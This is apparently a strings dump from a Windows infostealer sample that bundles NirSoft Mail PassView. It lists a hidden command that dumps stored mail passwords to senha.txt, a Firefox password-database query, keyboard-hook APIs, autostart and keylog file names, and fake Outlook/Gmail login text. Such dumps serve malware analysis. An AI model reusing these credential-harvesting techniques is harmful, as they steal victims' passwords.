7755555555555555
7755555555555555
1:
1:
KWindows
KWindows
UrlMon
UrlMon
rSqlTimSt
rSqlTimSt
0IdHTTPHeaderInfo
0IdHTTPHeaderInfo
IdTCPServer
IdTCPServer
IdTCPStream
IdTCPStream
.MaskEdEx
.MaskEdEx
Font.Charset
Font.Charset
Font.Color
Font.Color
Font.Height
Font.Height
Font.Name
Font.Name
Font.Style
Font.Style
Picture.Data
Picture.Data
.hs(9
.hs(9
.DT@i
.DT@i
.Xwwr
.Xwwr
T.NBQ
T.NBQ
l.EdV5N
l.EdV5N
>WH(BJ%s,
>WH(BJ%s,
Wm#&>9%UV
Wm#&>9%UV
L%US\
L%US\
.MxTw
.MxTw
d)q %xR
d)q %xR
$'%X6
$'%X6
-j}XT
-j}XT
%SpmM
%SpmM
\}-3}7
\}-3}7
%SqZ$S
%SqZ$S
q>.HX
q>.HX
}.iVsg;o
}.iVsg;o
Dw4.rm
Dw4.rm
`.ybr|
`.ybr|
UjV.kE
UjV.kE
>6Tm.rF
>6Tm.rF
i}%uV5/
i}%uV5/
'.xB
'.xB
z.YS^y
z.YS^y
.mj 6>
.mj 6>
ey.gZF
ey.gZF
cBEQ=.VL
cBEQ=.VL
544444444
544444444
b..N3gL%UJ
b..N3gL%UJ
.wa!!
.wa!!
!_%UY
!_%UY
T.Ct:R(@
T.Ct:R(@
]vM%U2X
]vM%U2X
.Sr]m
.Sr]m
L[;;;.Sj
L[;;;.Sj
.TYURV
.TYURV
Se|.Em(,
Se|.Em(,
dH6\%S
dH6\%S
4 [[[3
4 [[[3
?.FUd
?.FUd
...NII9
...NII9
Ai%SR#
Ai%SR#
q:\u~Mr
q:\u~Mr
%S
%S
I{.QP
I{.QP
W...Nh
W...Nh
rk.nFt
rk.nFt
yU%fo
yU%fo
D\>%f
D\>%f
.hmk^]
.hmk^]
Hg8%C
Hg8%C
,X`f%msg
,X`f%msg
dkeYe[Sc
dkeYe[Sc
JJJ%U
JJJ%U
JJJ%UO`
JJJ%UO`
%D|=*9P`
%D|=*9P`
Appearance.BackGroundColor
Appearance.BackGroundColor
Appearance.BorderColor
Appearance.BorderColor
Appearance.ActiveSegmentColor
Appearance.ActiveSegmentColor
Appearance.InActiveSegmentColor
Appearance.InActiveSegmentColor
clSilver!Appearance.TransitionSegmentColor
clSilver!Appearance.TransitionSegmentColor
Appearance.ProgressSegmentColor
Appearance.ProgressSegmentColor
O.kF{
O.kF{
WL^%U
WL^%U
QS-D}
QS-D}
29.Qm
29.Qm
1.2.0.1
1.2.0.1
X!%Ci
X!%Ci
Fu".VX1
Fu".VX1
m.HHHHl-
m.HHHHl-
p>KeY=
p>KeY=
`m.FD:D
`m.FD:D
n7g.oBn~a[
n7g.oBn~a[
.rN"X
.rN"X
!Appearance.TransitionSegmentColor
!Appearance.TransitionSegmentColor
/zv%s
/zv%s
(-joe}9
(-joe}9
!,*d-.Uag
!,*d-.Uag
.Vixb
.Vixb
.LScZ
.LScZ
.nK$j
.nK$j
?E.rxq
?E.rxq
%U$Zfn
%U$Zfn
,e)=
,e)=
B.
B.
h.Ug|
h.Ug|
KeYQ
KeYQ
X.MLj
X.MLj
}.PbgK
}.PbgK
keyv
keyv
K[%CS
K[%CS
Y-.UTi
Y-.UTi
Cu.Fud
Cu.Fud
.WQdm
.WQdm
#c&kEY
#c&kEY
MS.rk
MS.rk
.cJ%%:I
.cJ%%:I
u.oNX
u.oNX
1.2.0.0
1.2.0.0
y.VMM
y.VMM
G/.ZCw
G/.ZCw
=zx%uu
=zx%uu
.QY6k
.QY6k
A(..Faa!
A(..Faa!
.oK[n
.oK[n
Z.qd"
Z.qd"
.XQ^~
.XQ^~
.vvv)))w
.vvv)))w
J){.Vq
J){.Vq
%0U_~
%0U_~
U*.cx
U*.cx
!%%4
!%%4
/,,411155
/,,411155
2.Cslv
2.Cslv
~%ChwhX
~%ChwhX
q.cJ7
q.cJ7
:h
.mOY~
rssh7&
,%%%%u(
~p-w}O[
.GmHII
;s5%:1)%C
a\3d%f
5"%%u
.RNd6|>?
!%%%%%uh
aDv3#qb%F
.IDATx
7o.).NII
.Jh8g
3>41 5==#5
.jZwA
";.BZV
=7\.ig-V
`.My}4
%C X%
Ã^6&vY
P:\R~
iC'%%d
}:I%.TH
6-hW}s
7.SW]
%U(rP
.CePD"
((022266
ó6-
.dhRA
j-#)1%d
<.ky>.xoPG.hZ/E\.nPWX%DtHC%F"0$,C5.JK%Sxc%6*-===445J.xdwiUJ.nitmB.MVUW]%S.jB{=Y%xBg&.in;t.WkCM.eh=tsg.scLoginDialogDatabase Login&Password:PasswordDialogEnter password1.7.1.4.trRa"%.xL\Y%FQ555Y4>>.FToM.dAK.gzwt$W`.nq%%C$BNuuq%D&%u/.Xqb%D`;*Z%xrFZa}p%Du}mIsSHQU"!%%CTversion="1.0.0.0"name="Microsoft.Windows.Common-Controls"version="6.0.0.0"publicKeyToken="6595b64144ccf1df"MSGDLGTMSGRPCTMSGRPCDTMSGRPCHTMSGRPGTMSGRPGDTMSGRPGHTMSGRPUTMSGRPUDTMSGRPUHTSUIPASSWORDDIALOGTSUIURLLABELTLOGINDIALOGTPASSWORDDIALOGUnsupported PixelFormatInvalid stream operationInvalid extension introducerúiled to allocate memory for GIF DIBInvalid Image trailerAInternal error: Extension Instance does not match Extension Label,Unsupported Application Extension block sizeUnknown GIF block type'Object type not supported for operationRemote LoginUnsupported GIF versioncThis "Portable Network Graphics" image uses an unknown interlace scheme which could not be decoded.-The chunks must be compatible to be assigned.jThis "Portable Network Graphics" image is invalid because the decoder found an unexpected end of the file.8This "Portable Network Graphics" image contains no data.oSome operation could not be performed because the system is out of resources. Close some windows and try again.OThis operation is not valid because the current image contains no valid header.4The new size provided for image resizing is invalid.%s is not a valid BCD value$Could not parse SQL TimeStamp stringInvalid SQL date/time valuesOLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parametersSSL status: "%s"Host field is emptyjThis "Portable Network Graphics" image is not valid because it contains invalid pieces of data (crc error)yThe "Portable Network Graphics" image could not be loaded because one of its main piece of data (ihdr) might be corruptedUThis "Portable Network Graphics" image is invalid because it has missing image parts.[Could not decompress the image because it contains invalid compressed data.Description: BThe "Portable Network Graphics" image contains an invalid palette.The file being readed is not a valid "Portable Network Graphics" image because it contains an invalid header. This file may be corruped, try obtaining it again.nThis "Portable Network Graphics" image is not supported or it might be invalid.This "Portable Network Graphics" image is not supported because either it's width or height exceeds the maximum size, which is 65535 pixels length.There is no such palette entry.dThis "Portable Network Graphics" image contains an unknown critical part which could not be decoded.pThis "Portable Network Graphics" image is encoded with an unknown compression scheme which could not be decoded.Command not supported.Address type not supported.$Error accepting connection with SSL.Error creating SSL context. Could not load root certificate.Could not load certificate.#Could not load key, check password.Request rejected or failed.5Request rejected because SOCKS server cannot connect.QRequest rejected because the client program and identd report different user-ids.Protocol family not supported.0Address family not supported by protocol family.Socket is not connected..Cannot send or receive after socket is closed.#Too many references, cannot splice.Operation would block.Operation now in progress.Operation already in progress.Socket operation on non-socket.Protocol not supported.Socket type not supported."Operation not supported on socket.Max line length exceeded.*Error on call Winsock2 library function %s&Error on loading Winsock2 library (%s)Resolving hostname %s.Connecting to %s.Chunk StartedDThis authentication method is already registered with class name %s.%s is not a valid service.Socket Error # %dConnection Closed Gracefully.;Could not bind socket. Address and port are already in use.4Failed attempting to retrieve time zone information.File "%s" not found1Only one TIdAntiFreeze can exist per application.No data to read.$Can not bind in port range (%d - %d)Invalid Port Range (%d - %d)Window Text=This control requires version 4.70 or greater of COMCTL32.DLLDate exceeds maximum of %sDate is less than minimum of %s4You must be in ShowCheckbox mode to set to this date#Failed to set calendar date or timeúiled to set maximum selection range$Failed to set calendar min/max rangeúiled to set calendar selected rangeNo help keyword specified.&Cannot change the size of a JPEG imageJPEG error #%dNo help found for %s#No context-sensitive help installed$No topic-based help system installedValue must be between %d and %dInvalid clipboard format Clipboard does not support IconsText exceeds memo capacity/Menu '%s' is already being used by another formError creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window%s property out of rangeFailed to set data for '%s'Resource %s not found%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration groupProperty %s does not existThread creation error: %sThread Error: %s (%d)Unsupported clipboard formatInvalid stream format$''%s'' is not a valid component nameInvalid property element: %sInvalid property type: %sInvalid data type for '%s' List capacity out of bounds (%d)List count out of bounds (%d)List index out of bounds (%d) Out of memory while expanding memory streamError reading %s%s%s: %sFailed to get data for '%s'Ancestor for '%s' not foundCannot assign a %s to a %sBits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main threadClass %s not foundA class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicatesCannot create file "%s". %sCannot open file "%s". %sOperation not supportedExternal exception %xInterface not supported%s (%s, line %d)Abstract Error?Access violation at address %p in module '%s'. %s of address %pSystem Error. Code: %d.No argument for format '%s'"Variant method calls not supportedInvalid variant operation%Invalid variant operation (%s%.8x)%s,Custom variant type (%s%.4x) is out of range/Custom variant type (%s%.4x) already used by %s*Custom variant type (%s%.4x) is not usable2Too many custom variant types have been registered5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)Integer overflow Invalid floating point operationInvalid pointer operationInvalid class typecast0Access violation at address %p. %s of address %pPrivileged instruction(Exception %s in module %s at %p.Application Error1Format '%s' invalid or incompatible with argument!'%s' is not a valid integer value('%s' is not a valid floating point value!'%s' is not a valid date and time'%s' is not a valid GUID valueI/O error %d2.3.4.51.0.0.1AvastK.exe_1520:.idata.rdataP.relocP.rsrckernel32.dllWindowsMSWHEEL_ROLLMSGMSH_WHEELSUPPORT_MSGMSH_SCROLL_LINES_MSG$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)oleaut32.dllEVariantBadIndexErrorssShifthtKeywordEInvalidOperationu%CNu%s[%d]%s_%dEInvalidGraphicOperationUSER32.DLLcomctl32.dlluxtheme.dllProportionalMAPI32.DLLPasswordChar(OnKeyDownOnKeyPressDOnKeyUphssHorizontalOnKeyUpHIE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")JumpID("","%s")TKeyEventTKeyPressEventHelpKeywordcrSQLWait%s (%s)imm32.dllAutoHotkeysHAutoHotkeysssHotTrackTWindowStatepoProportionalTWMKeyKeyPreviewWindowStatettagMSGSystem\CurrentControlSet\Control\Keyboard Layouts\%.8xvcltest3.dllUser32.dllOnExecuteMacroService %sTopic %sOnActionExecutelgetservbyportWSAAsyncGetServByPortWSAJoinLeafWS2_32.DLL127.0.0.1TIdSocketListWindowsTIdStackWindowsUIdStackWindows%s, %d %s %d %s %sftpTransferftpReadyftpAbortedClientPortMinTClientPortMaxPortEIdCanNotBindPortInRangeEIdInvalidPortRangeSVWsaUsernamePasswordPasswordTPort0.0.0.1TIdTCPConnectionTIdTCPConnection`IdTCPConnectionEIdTCPConnectionErrorTIdTCPClientTIdTCPClient0IdTCPClientBoundPortPortUpasswordPasswordIdHTTPHeaderInfoProxyPasswordTProxyPortMozilla/3.0 (compatible; Indy Library)libeay32.dllssleay32.dllSSL_CTX_use_PrivateKey_fileSSL_CTX_use_certificate_fileSSL_get_peer_certificateSSL_CTX_set_default_passwd_cbSSL_CTX_set_default_passwd_cb_userdataSSL_CTX_check_private_keyX509_STORE_CTX_get_current_certdes_set_keysslvrfFailIfNoPeerCertTPasswordEventCertificateRootCertFileCertFileKeyFileOnGetPasswordh'GEIdOSSLLoadingRootCertErrorEIdOSSLLoadingCertErrorEIdOSSLLoadingKeyErrorCommentURLTIdHTTPMethodIdHTTPTIdHTTPOptionTIdHTTPOptionsTIdHTTPProtocolVersionTIdHTTPOnRedirectEventTIdHTTPResponseTIdHTTPResponsetqGTIdHTTPRequestTIdHTTPRequest,rGTIdHTTPProtocol@sGTIdCustomHTTPTIdCustomHTTP@sGTIdHTTP(uGTIdHTTPptGHTTPOptionsPortHeGEIdHTTPProtocolExceptionapplication/x-www-form-urlencodedHTTPShttpsThis request method is supported in HTTP 1.1HTTP/1.0 200 OKHTTP/msoe@microsoft.com*.dbxC:\Windows\winx.log*.wab*.mbx*.mai*.eml*.tbb*.mbox1.2.3Portable Network Graphicsc:\program files\borland\delphi7\Lib\AdvEdDD.pasetPasswordTURLClickEventShowURLURLColorPasswordCharOnURLClickCOMCTL32.DLL\EMBUTIR1.execmd.exe /c "EMBUTIR1.exe /stext\senha.txt"\winhelp32.txt\h4714log.txt\senha.txt\autostart.batdeflate 1.2.3 Copyright 1995-2005 Jean-loup Gaillyinflate 1.2.3 Copyright 1995-2005 Mark Adler?456789:;!"#$%&'()* ,-./0123user32.dllGetKeyboardTypeadvapi32.dllRegOpenKeyExARegCloseKeyRegFlushKeyRegCreateKeyExAWinExecGetCPInfoversion.dllgdi32.dllSetViewportOrgExUnhookWindowsHookExSetWindowsHookExAMsgWaitForMultipleObjectsMapVirtualKeyALoadKeyboardLayoutAGetKeyboardStateGetKeyboardLayoutListGetKeyboardLayoutGetKeyStateGetKeyNameTextAEnumWindowsEnumThreadWindowsActivateKeyboardLayoutole32.dllshell32.dllShellExecuteA9!9%9)9-919: :$:(:,:0:4:8:<:>2%2 272>2= =$=(=,=0=4=8-858M8U8q8y8}86 6$6(6,6064686515@5\5|53 3$3(3,30343832 2$282^21 1$1(1,1014181!0%0)0-010805"5&5*5.525659.92969:95&545]5|5.text`.rdata@.data.rsrct{SShv%SSWMail PassViewMozilla\ProfilesSoftware\Mozilla\Mozilla Thunderbird%s\Mainsqlite3.dllnss3.dll%programfiles%\Mozilla ThunderbirdAddExportHeaderLine%s %s %sHTTPMail User NameSMTP USer NameHTTPMail ServerSMTP ServerPOP3 Password2IMAP Password2HTTPMail Password2SMTP Password2POP3 PortIMAP PortHTTPMail PortSMTP PortHTTPMail Secure ConnectionSMTP Secure ConnectionSMTP Display NameSMTP Email AddressPOP3 PasswordIMAP PasswordHTTP PasswordSMTP PasswordHTTP UserSMTP UserHTTP Server URLHTTP PortHTTPMail Use SSLSMTP Use SSL%s\%sPopPortPopPasswordSMTPAccountSMTPServerSMTPPortSMTPLogSecureSMTPPassword%s\AccountsLoginNameSavePasswordTextESMTPUsernameESMTPPasswordPOP3Passwordfb.dat%s@gmail.com%s@yahoo.com"Account","Login Name","Password","Web Site","Comments"Software\Microsoft\Windows Messaging Subsystem\ProfilesSoftware\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles%s %s
smtp*.ininetmsg.dllError %d: %smenu_%ddialog_%dTranslatorURL_lng.ini%-18s: %s%%-%d.%ds%s%s%s%sbgcolor="%s"%s%s%s>%s>report.html*.txt*.htm;*.html*.xml*.csvSoftware\NirSoft\MailPassViewMailPassView/skeepass/deleteregkeyFailed to load the executable file !mail.account.accountmail.serverportmail.identitysignon.signonfilenamemailbox://%s@%simap://%s@%sSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_loginsmailbox://%simap://%ssmtp://%ssignons.txtsignons.sqliteprefs.jsPassword.NET Messenger ServiceUser.NET Messenger ServicePassport.Net\*ps:passwordwindowslive:name=Exception %8.8X at address %8.8X in module %sStack Data: %sCode Data: %smozsqlite3.dllPK11_GetInternalKeySlotPK11_CheckUserPasswordpsapi.dllpstorec.dll5e7e8100-9138-11d1-945a-00c04fc308ff00000000-0000-0000-0000-000000000000220D5CD0-853A-11D0-84BC-00C04FD43F8F220D5CD1-853A-11D0-84BC-00C04FD43F8F220D5CC1-853A-11D0-84BC-00C04FD43F8F417E2D75-84BD-11D0-84BB-00C04FD43F8FSoftware\Microsoft\Windows\CurrentVersion\Explorer\Shell Foldersshlwapi.dll%s%s%s%s
size="%d"color="#%s"width="%s"
%s%s%sSOFTWARE\Mozilla mozilla %s\bin PathToExe \sqlite3.dll \mozsqlite3.dll sqlite3_open sqlite3_prepare sqlite3_step sqlite3_column_text sqlite3_column_int sqlite3_column_int64 sqlite3_finalize sqlite3_close sqlite3_exec Software\Microsoft\Windows Mail Software\Microsoft\Windows Live Mail SMTP_Server SMTP_User_Name POP3_Password2 IMAP_Password2 NNTP_Password2 SMTP_Password2 SMTP_Email_Address SMTP_Port NNTP_Port IMAP_Port POP3_Port SMTP_Secure_Connection *.oeaccount \Microsoft\Windows Mail \Microsoft\Windows Live Mail f:\Projects\VS2005\mailpv\Release\mailpv.pdb msvcrt.dll _acmdln COMCTL32.dll RPCRT4.dll GetWindowsDirectoryA KERNEL32.dll EnumChildWindows USER32.dll GDI32.dll comdlg32.dll RegDeleteKeyA RegEnumKeyA RegEnumKeyExA ADVAPI32.dll SHELL32.dll NirSoftPADPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING` hXXp://VVV.usertrust.com1 3hXXp://crl.usertrust.com/AddTrustExternalCARoot.crl05 hXXp://ocsp.usertrust.com0 1hXXp://crl.usertrust.com/UTN-USERFirst-Object.crl05 1hXXp://crl.usertrust.com/UTN-USERFirst-Object.crl0t 1hXXp://crt.usertrust.com/UTNAddTrustObject_CA.crt0% hXXps://secure.comodo.net/CPS0A 0hXXp://crl.comodoca.com/COMODOCodeSigningCA2.crl0r 0hXXp://crt.comodoca.com/COMODOCodeSigningCA2.crt0$ hXXp://ocsp.comodoca.com0 support@nirsoft.net0 333333333333333333 33333833 3333339 3333333333333338 :*"*"$3338 3333333 33333333 33333333333 3333333333338 33338?383 333333333333 :*3:"$3338 333333333333333 KWindows UrlMon 0IdHTTPHeaderInfo IdTCPServer IdTCPStream Font.Charset Font.Color Font.Height Font.Name Font.Style Login Picture.Data -gGrgZ9} Icon.Data 33333333333333333 %#%#%#%#%#%#%#%#%#%#% .FoO'Z %cj@3 ib&%s .UNk%#r D.BCn haz$.kI tNG%s3 H.dKe "j4W%u is.Qfe .dci, PM%0x ZX.kG %s js \HB =.FmK X.Hl^2 .VY2U %S>VV 3V.Kb l%SFW[ 6,%U@ RY.yAo2 uFÃ .cJotqYm L.bfQ )b2Ã LabelFont.Charset LabelFont.Color LabelFont.Height LabelFont.Name LabelFont.Style Lookup.Separator 2.9.1.4 G%sXj~z %SSXt .xak[`9 .mUIWJH GN .SA ~cBMmSg'cemv Equipe do Outlook.com TIdHTTP ProxyParams.BasicAuthentication ProxyParams.ProxyPort Request.ContentLength Request.ContentRangeEnd Request.ContentRangeStart Request.ContentType Request.Accept Request.BasicAuthentication Request.UserAgent &Mozilla/3.0 (compatible; Indy Library) VVV.google.com/Please log in to your Gmail account VVV.google.com:443/Please log in to your Gmail account VVV.google.com/Please log in to your Google Account VVV.google.com:443/Please log in to your Google Account VVV.google.com dWindowsLive:name=* abe2869f-9b47-4cd9-a358-c22904dba7f7 82BD0E67-9FEA-4748-8672-D5EFE5B779B0 Copy Password &HTML Report - All Items HTML R&eport - Selected Items HTML Report - All Items HTML Report - Selected Items %d items , %d Selected Select Eudora.ini filename/Select the location of Thunderbird installation Loading... %d KeePass csv file Eudora.ini file SMTP Windows Mail Windows Live Mail Server Port Password Strength SMTP Server Port Mail Password Recovery Mail PassView This "Portable Network Graphics" image is not supported because either it's width or height exceeds the maximum size, which is 65535 pixels length. There is no such palette entry.dThis "Portable Network Graphics" image contains an unknown critical part which could not be decoded.pThis "Portable Network Graphics" image is encoded with an unknown compression scheme which could not be decoded.cThis "Portable Network Graphics" image uses an unknown interlace scheme which could not be decoded.-The chunks must be compatible to be assigned.jThis "Portable Network Graphics" image is invalid because the decoder found an unexpected end of the file.8This "Portable Network Graphics" image contains no data.oSome operation could not be performed because the system is out of resources. Close some windows and try again.OThis operation is not valid because the current image contains no valid header.4The new size provided for image resizing is invalid. SSL status: "%s" Host field is emptyjThis "Portable Network Graphics" image is not valid because it contains invalid pieces of data (crc error)yThe "Portable Network Graphics" image could not be loaded because one of its main piece of data (ihdr) might be corruptedUThis "Portable Network Graphics" image is invalid because it has missing image parts.[Could not decompress the image because it contains invalid compressed data. Description: BThe "Portable Network Graphics" image contains an invalid palette. The file being readed is not a valid "Portable Network Graphics" image because it contains an invalid header. This file may be corruped, try obtaining it again.nThis "Portable Network Graphics" image is not supported or it might be invalid. Command not supported. Address type not supported.$Error accepting connection with SSL. Error creating SSL context. Could not load root certificate. Could not load certificate.#Could not load key, check password. .Cannot send or receive after socket is closed.#Too many references, cannot splice. Request rejected or failed.5Request rejected because SOCKS server cannot connect.QRequest rejected because the client program and identd report different user-ids. Protocol not supported. Socket type not supported."Operation not supported on socket. Protocol family not supported.0Address family not supported by protocol family. DThis authentication method is already registered with class name %s. %s is not a valid service. Socket Error # %d Operation would block. Operation now in progress. Operation already in progress. Socket operation on non-socket. No data to read.$Can not bind in port range (%d - %d) Invalid Port Range (%d - %d) Max line length exceeded.*Error on call Winsock2 library function %s&Error on loading Winsock2 library (%s) Resolving hostname %s. Connecting to %s. No help keyword specified. Connection Closed Gracefully.;Could not bind socket. Address and port are already in use.4Failed attempting to retrieve time zone information. File "%s" not found1Only one TIdAntiFreeze can exist per application. 8Listbox (%s) style must be virtual in order to set Count"Unable to find a Table of Contents No help found for %s#No context-sensitive help installed$No topic-based help system installed Invalid clipboard format Clipboard does not support Icons Text exceeds memo capacity/Menu '%s' is already being used by another form Error setting %s.Count Cannot drag a form"An error returned from DDE ($0%x)/DDE Error - conversation not established ($0%x)0Error occurred when DDE ran out of memory ($0%x)"Unable to connect DDE conversation Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window $Operation not allowed on sorted list$%s not in a class registration group Property %s does not exist Thread creation error: %s Thread Error: %s (%d) Unsupported clipboard format Invalid data type for '%s' List capacity out of bounds (%d) List count out of bounds (%d) List index out of bounds (%d) Out of memory while expanding memory stream Error reading %s%s%s: %s Failed to create key %s Failed to get data for '%s' Failed to set data for '%s' Resource %s not found %s.Seek not implemented Ancestor for '%s' not found Cannot assign a %s to a %s Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread Class %s not found A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates Cannot create file "%s". %s Cannot open file "%s". %s Unable to write to %s Invalid stream format$''%s'' is not a valid component name Operation not supported External exception %x Interface not supported %s (%s, line %d) Abstract Error?Access violation at address %p in module '%s'. %s of address %p System Error. Code: %d. 1Format '%s' invalid or incompatible with argument No argument for format '%s'"Variant method calls not supported Invalid variant operation%Invalid variant operation (%s%.8x) %s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s) Integer overflow Invalid floating point operation Invalid pointer operation Invalid class typecast0Access violation at address %p. %s of address %p Privileged instruction(Exception %s in module %s at %p. !'%s' is not a valid integer value('%s' is not a valid floating point value '%s' is not a valid date '%s' is not a valid time!'%s' is not a valid date and time I/O error %d 1.5.4.3 1.0.0.0 |
---|